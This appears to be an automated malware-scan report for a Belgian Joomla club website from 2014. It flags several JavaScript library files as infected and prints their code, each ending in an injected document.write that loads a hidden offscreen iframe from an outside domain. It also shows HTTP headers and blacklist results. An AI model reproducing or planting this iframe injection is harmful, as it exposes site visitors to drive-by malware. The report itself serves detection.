Scanned pages/files
Request | Server response | Status |
http://waterduivels.be/ | 200 OK Content-Length: 6675 Content-Type: text/html | clean |
http://waterduivels.be/media/system/js/mootools-core.js | 200 OK Content-Length: 96538 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){this.MooTools={version:"1.4.5",build:"ab8ea8824dc3b24b6666867a2c4ed58ebb762cf0"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family!=null){return i.$family(); }if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments"; }if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){retur return eval(rs);};})();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/media/system/js/core.js | 200 OK Content-Length: 4960 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/media/system/js/caption.js | 200 OK Content-Length: 905 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!= ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/media/system/js/mootools-more.js | 200 OK Content-Length: 238507 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) MooTools.More={version:"1.4.0.1",build:"a4244edf2aa97ac8a196fc96082dd35af1abab87"};(function(){Events.Pseudos=function(h,e,f){var d="_monitorEvents:";var c=function(i){return{store:i.store?function(j,k){i.store(d+j,k); }:function(j,k){(i._monitorEvents||(i._monitorEvents={}))[j]=k;},retrieve:i.retrieve?function(j,k){return i.retrieve(d+j,k);}:function(j,k){if(!i._monitorEvents){return k; }return i._monitorEvents[j]||k;}};};var g=function(k){if(k.indexOf(":")==-1||!h){return null;}var j=S }});;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://htwlckg.qhigh.com/02c4ae3.loa?11"></iframe>'); Antivirus reports:
| ||
http://waterduivels.be/index.php | 200 OK Content-Length: 6684 Content-Type: text/html | clean |
http://waterduivels.be/index.php/wie-zijn-wij | 200 OK Content-Length: 8299 Content-Type: text/html | clean |
http://waterduivels.be/index.php/het-bestuur | 200 OK Content-Length: 7719 Content-Type: text/html | clean |
http://waterduivels.be/index.php/contact | 200 OK Content-Length: 10314 Content-Type: text/html | clean |
http://waterduivels.be/index.php/trainingen | 200 OK Content-Length: 7593 Content-Type: text/html | clean |
http://waterduivels.be/index.php/interesse | 200 OK Content-Length: 28407 Content-Type: text/html | clean |
http://waterduivels.be/media/system/js/calendar.js | 200 OK Content-Length: 30489 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar=function(d,c,f,a){this.activeDiv=null;this.currentDateEl=null;this.getDateStatus=null;this.getDateToolTip=null;this.getDateText=null;this.timeout=null;this.onSelected=f||null;this.onClose=a||null;this.dragging=false;this.hidden=false;this.minYear=1970;this.maxYear=2050;this.dateFormat=Calendar._TT.DEF_DATE_FORMAT;this.ttDateFormat=Calendar._TT.TT_DATE_FORMAT;this.isPopup=true;this.weekNumbers=true;this.firstDayOfWeek=typeof d=="number"?d:Calendar._FD;this.showsOtherMonths=false;this.dat Antivirus reports:
| ||
http://waterduivels.be/media/system/js/calendar-setup.js | 200 OK Content-Length: 3266 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar.setup=function(g){function f(h,i){if(typeof g[h]=="undefined"){g[h]=i}}f("inputField",null);f("displayArea",null);f("button",null);f("eventName","click");f("ifFormat","%Y/%m/%d");f("daFormat","%Y/%m/%d");f("singleClick",true);f("disableFunc",null);f("dateStatusFunc",g.disableFunc);f("dateTooltipFunc",null);f("dateText",null);f("firstDay",null);f("align","Br");f("range",[1900,2999]);f("weekNumbers",true);f("flat",null);f("flatCallback",null);f("onSelect",null);f("onClose",null);f("onUpda Antivirus reports:
| ||
http://waterduivels.be/index.php/inschrijvingen | 200 OK Content-Length: 17717 Content-Type: text/html | clean |
http://waterduivels.be/index.php/google-kalender | 200 OK Content-Length: 7034 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: waterduivels.be
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 05 Oct 2014 00:35:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 884bee7307b586ab8856086ba4b3205c=029c11757d6b8a57caec34f725acc340; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: waterduivels.be
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 05 Oct 2014 00:35:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 884bee7307b586ab8856086ba4b3205c=029c11757d6b8a57caec34f725acc340; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: waterduivels.be
Referer: http://www.google.com/search?q=waterduivels.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: waterduivels.be
Referer: http://www.google.com/search?q=waterduivels.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=waterduivels.be
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://waterduivels.be/
Result: waterduivels.be is not infected or malware details are not published yet.
Result: waterduivels.be is not infected or malware details are not published yet.